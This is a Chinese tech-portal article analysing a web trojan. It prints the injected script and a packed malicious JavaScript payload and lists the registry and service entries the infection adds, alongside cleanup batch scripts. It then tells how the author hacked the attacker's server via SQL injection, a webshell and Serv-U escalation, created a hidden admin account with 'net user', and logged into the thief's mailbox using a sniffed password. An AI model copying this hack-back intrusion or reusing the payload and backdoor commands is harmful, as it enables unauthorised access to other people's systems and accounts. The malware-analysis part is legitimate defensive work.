科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道以毒攻毒 直捣“毒窟”

以毒攻毒 直捣“毒窟”

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

如今互联网上木马病毒十分猖獗,您一不小心就可能深陷病毒的泥潭,如何及时发现并对这种恼人的网络威胁宣战?如何避免用户的信息安全呢?本文将详细介绍……

作者:甘肃/老五 来源:IT专家网 2008年10月9日

关键字: 病毒防范 防病毒

  • 评论
  • 分享微博
  • 分享邮件

  说互联网上到处是“马窝”、“毒窟”,你信吗?不信?我们就来个现场直播!上演一场以毒攻毒,直捣“毒窝”的攻坚战,出发......

  一、陷入毒窝

  我们在Google中搜索资料的时候,经常会看到这样的搜索结果“该网站可能含有恶意软件,有可能会危害您的电脑。”或者“继续访问 http://www.*.com,但风险自担。”这是Google以自己的方式对网页安全性分析的结果。我们没有理由怀疑Google的技术,这是它在以自己的方式告诉我们“这是个毒窝”。以“不入虎穴,焉得虎子”的英勇,我们就去探探虎穴。

  测试环境说明:一安装有Windows XP的虚拟机,没有打补丁包,没有安装杀毒软件和防火墙。

  1.探毒

  第一步:下载网页

  (为了不至于“出师未捷,而光荣牺牲。”我先把挂马的网页下载下来。看看到底用了什么网马,怎么挂的?)用迅雷很快地把挂了马的网页下载下来。

  第二步:分析网页代码

  用记事本打开网页查看源代码,通过分析,发现挂马者在该网站的首页的开头和尾部都加入了如下的代码:

  <SCRIPT language=javascript>

  window.open ("http://www.*.com/1.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script>

  这是一个用javascript脚本木马的代码,其中的http://www.*.com/1.htm应该是网页木马的地址。

  第三步:继续用迅雷下载http://www.*.com/1.htm,用记事本打开,代码如下:

  <script language=javascript src="http://my.*.com/admin.js>";</script>

  这是一个木马脚本,通过脚本调用了一个js文件。

  第四步:用迅雷下载admin.js文件,用记事本打开,部分代码如下:

  eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('Z("\\l\\t\\6\\9\\2\\g\\f\\6\\1\\K\\6\\d\\6\\b\\1\\Q\\1\\u\\5\\7\\1\\6\\t\\c\\q\\0\\7\\1\\j\\1\\L\\5\\2(中间省去n多......)\\f\\e\\0\\6\\3\\i\\p\\b\\8\\1\\O\\1\\9\\5\\2\\9\\x\\d\\g\\b\\1\\Q\\1\\g\\j\\o\\8\\1\\O")',62,68,'145|40|164|42|56|141|156|162|73|143|144|51|155|50|160|157|151|154|54|75|123|146|163|47|61|60|142|170|53|165|166|106|103|150|117|152|101|57|171|167|55|105|124|102|66|63|147|115|71|65|175|120|173|62|121|72|134|104|107|176|52|eval|114|110|127|70|64|130'.split('|'),0,{}))

  很明显这个网马加密并且编译了,通过Google查询这应该是冰狐的网马。

  2.试毒:用虚拟机器的浏览器中打开被挂马的网页地址,有一个小窗口突然闪了一下消失了,网页迟迟不能打开,桌面任务栏上的网络连接图表突然长亮,硬盘狂响,应该是在往硬盘上下载什么。不管什么了,我不入地狱,谁入地狱?大概20秒钟好像木马好像已经下载完毕并运行了。

  二、刮骨疗伤

  木马入驻系统后对几个关键的地方进行查看。

  刮骨:

  1.任务管理器:

  运行任务管理器,通过和以前的进程对比发现多了lexplore.exe、SVCH0ST.EXE(0是数字)两个未知进程。试着结束lexplore.exe进程,可以,但不到五秒钟又出现了。结束SVCH0ST.EXE进程,同样不到一秒也出现了。为什么会这样呢?通过分析发现:原来这两个进程是木马释放的两个文件创建的,构成了双保险,互相监视。当一方的进程被结束,另一方在下一个周期内对进程表进行扫描发现对方不在,就重新创建一个。另外如果有一个文件被删除,Wlgx.dll会重新释放一个(这是后来才发现的)。

  2.在搜索最新的文件:

  通过“资源管理器”→“工具”→“文件夹选项”→“查看”中设置“显示所有的文件”,运用文件搜索工具搜索今天创建的所有文件。通过对搜索结果的分析发现了几个可疑的文件,它们分别是:

  临时目录:%temp%\Wl2\lexplore.exe)

  释放库文件:%temp%\Wlgx.dll

  系统目录:%systemroot%\system32\SVCH0ST.EXE %systemroot%\system32\lexplore.exe

  在每个根目录下出现了三个文件:auatorun.inf、lexplore.exe、SVCH0ST.EXE(目的是在打开各个根目录的时候病毒会自动运行。)

  注:以上文件都是隐藏、只读、系统文件。

  3.注册表中新添加的项目

  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

  "myWl2"="%temp%\Wl2\lexplore.exe"

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

  "Shell"="EXPLORER.EXE,SVCH0ST.EXE"

  4.服务管理器

  运行服务管理器通过对比发现多了两个可疑的项目:

  服务名称:SVCH0ST

  显示名称:SVCHOST

  描述:系统网络服务组件

  可执行文件的路径:c:\windows\system32\SVCH0ST.EXE

  启动类型:自动

  服务状态:启动

  服务名称:lexplore.exe

  显示名称:lexplore.exe

  描述:网络浏览辅助

  可执行文件的路径:c:\windows\system32\lexplore.exe

  启动类型:自动

  服务状态:启动

  共2页。 12:

  作者: 甘肃/老五,  出处:IT专家网, 责任编辑: 张帅,  2007-12-21 08:52

  如今互联网上木马病毒十分猖獗,您一不小心就可能深陷病毒的泥潭,如何及时发现并对这种恼人的网络威胁宣战?如何避免用户的信息安全呢?本文将详细介绍……

  疗伤:

  1.结束进程:由于这两个进程直接互相保护,只能采取非常规的办法,用批处理,代码如下:

  @echo off

  taskkill /f /im SVCH0ST.EXE

  copy c:\windows\notepad.exe c:\windows\system32\SVCH0ST.EXE

  taskkill /f /im lexplore.exe

  del c:\windows\system32\SVCH0ST.EXE

  del c:\windows\system32\lexplore.exe

  exit

  说明:(1).由于两个进程之间互相保护,大概每隔五秒钟就扫描一次进程,如果用手工的方法太慢,没有等把源文件删除,木马的进程已经被创建出来,就无法删除源文件。(2).代码第三行在SVCHOST.EXE进程被结束掉后,用notepad.exe(记事本)程序替换木马程序,那么当lexplore.exe进程发现SVCH0ST.EXE进程被结束重新创建的该进程,其实就是打开了记事本程序。那么现在结束lexplore.exe进程,就不会有真正的SVCH0ST.EXE保护了。

  2.删除病毒文件:两个系统目录下的病毒文件被删除,其它地方的病毒我们同样用批处理,代码如下:

  @echo off

  del %temp%\Wl2\lexplore.exe

  del %temp%\Wlgx.dll

  cd

  attrib -a -s -h autorun.inf

  attrib -a -s -h lexplore.exe

  attrib -a -s -h SVCH0ST.EXE

  del autorun.inf

  del lexplore.exe

  del SVCH0ST.EXE

  d:

  attrib -a -s -h autorun.inf

  attrib -a -s -h lexplore.exe

  attrib -a -s -h SVCH0ST.EXE

  del autorun.inf

  del lexplore.exe

  del SVCH0ST.EXE

  注:我的虚拟机只有两个分区,为了下面的木马分析,我保存了lexplore.exe、SVCH0ST.EXE、Wlgx.dll木马文件。

  三、深入毒窝

  文章写到这里,突然有个想法,进入毒窟看看!试试能否进入那台挂马者放置木马文件主机。

  这是一台web服务器,先旁注看看目标还有什么站,结果发现是一个商业站点,只有一个站,主机是独立的。不管那么多,开着X-Scan扫描一下再说,接着去问问“Google”,看看到底是个什么站。关键字输入:http://www.*.com(安全原因,用了*)结果什么也没有出来,点击下面的“寻找网页包含有www.*.com”,出现了不该看到的结果。这些网站都被插入了木马,真可怜,稍微整理了一下搜索结果,除去有些站长求助的帖子外,足有30多个不同的站点被插入了恶意代码!而且都是国内的站点。先不管了,看看我的扫描结果,目标开了21.80.3389端口。21的FTP连接不上,80是网址服务器,3389是默认的终端服务器,先3389连接看看,过了N久才连接上,速度特慢。尝试了几个弱密码均告失败。去http://www.ip138.com看了一下,填上Ping出来的ip地址,才发现是深圳网通的主机,和笔者所在地区相隔太远,怪不得这么慢。

  换个思路,试试为web注入,千辛万苦找到一个注入点,获取管理员账户和密码,扫描得到网站后台,登录进入后台,通过“备份数据库”得到一个webshell。试试cmd,可以执行,但权限太低。对方开来ftp应该安装有ftp软件。果然在“c:\Program Files”中看到了Serv-U,著名的Serv-U漏洞大家都知道吧!试试提权,不成功!上传一个ftp提取工具,再试成功。可以马上创建一个管理员用户:

  net user asp$ "test" /add

  net localgroup administrators asp$ /add

  389远程登录,大概看了一下帮管理员清除了网马,留言提示管理员修补漏洞,撤人。

  四、还治其人

  通过分析SVCH0ST.EXE是木马的主程序,运用查壳工具发现加了壳,马上脱壳。用十六进制编辑器WinHex打开脱壳后的木马,估计是个QQ尾巴木马,这样的木马是用来盗取QQ的,一般把盗取的QQ号和密码发到指定的邮箱,或者ftp服务器的一个文件中。以http、www搜索,没有结果,看来它不是用ftp文件形式存放QQ号和密码的。再以@*.com搜索,终于看到了一个邮箱地址*@gmail.com(安全原因,用了*),查找密码,没有发现,一定是加密了。一般这样的木马在配置的时候必须要填入邮箱密码,不然不能发送邮件。我们先打开嗅探工具,我用的是WSockExpert,设置对于SVCH0ST.EXE的网络数据进行嗅探。接着运行QQ输入用户名和密码登录,登录成功,这期间看见WSockExpert再不断地抓包,大概再QQ登录后一分钟停止嗅探。通过对数据包的分析很快找到了邮箱密码,因为是明文,所有很好找。马上登录邮箱,成功了!好家伙,竟然盗了这么多,我的QQ号和密码赫然其中!怎么办?改了他的邮箱密码吗?算了,删了与QQ相关的邮件,另外用邮箱自发一个警告邮件!

  结束语:这次“攻毒”行动,虽有波折,但还算顺利。用两句话来结束这篇文章:我不入地狱,谁人地狱?我入地狱,为了你们不入地狱!

  IT专家网原创文章,未经许可,严禁转载!

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章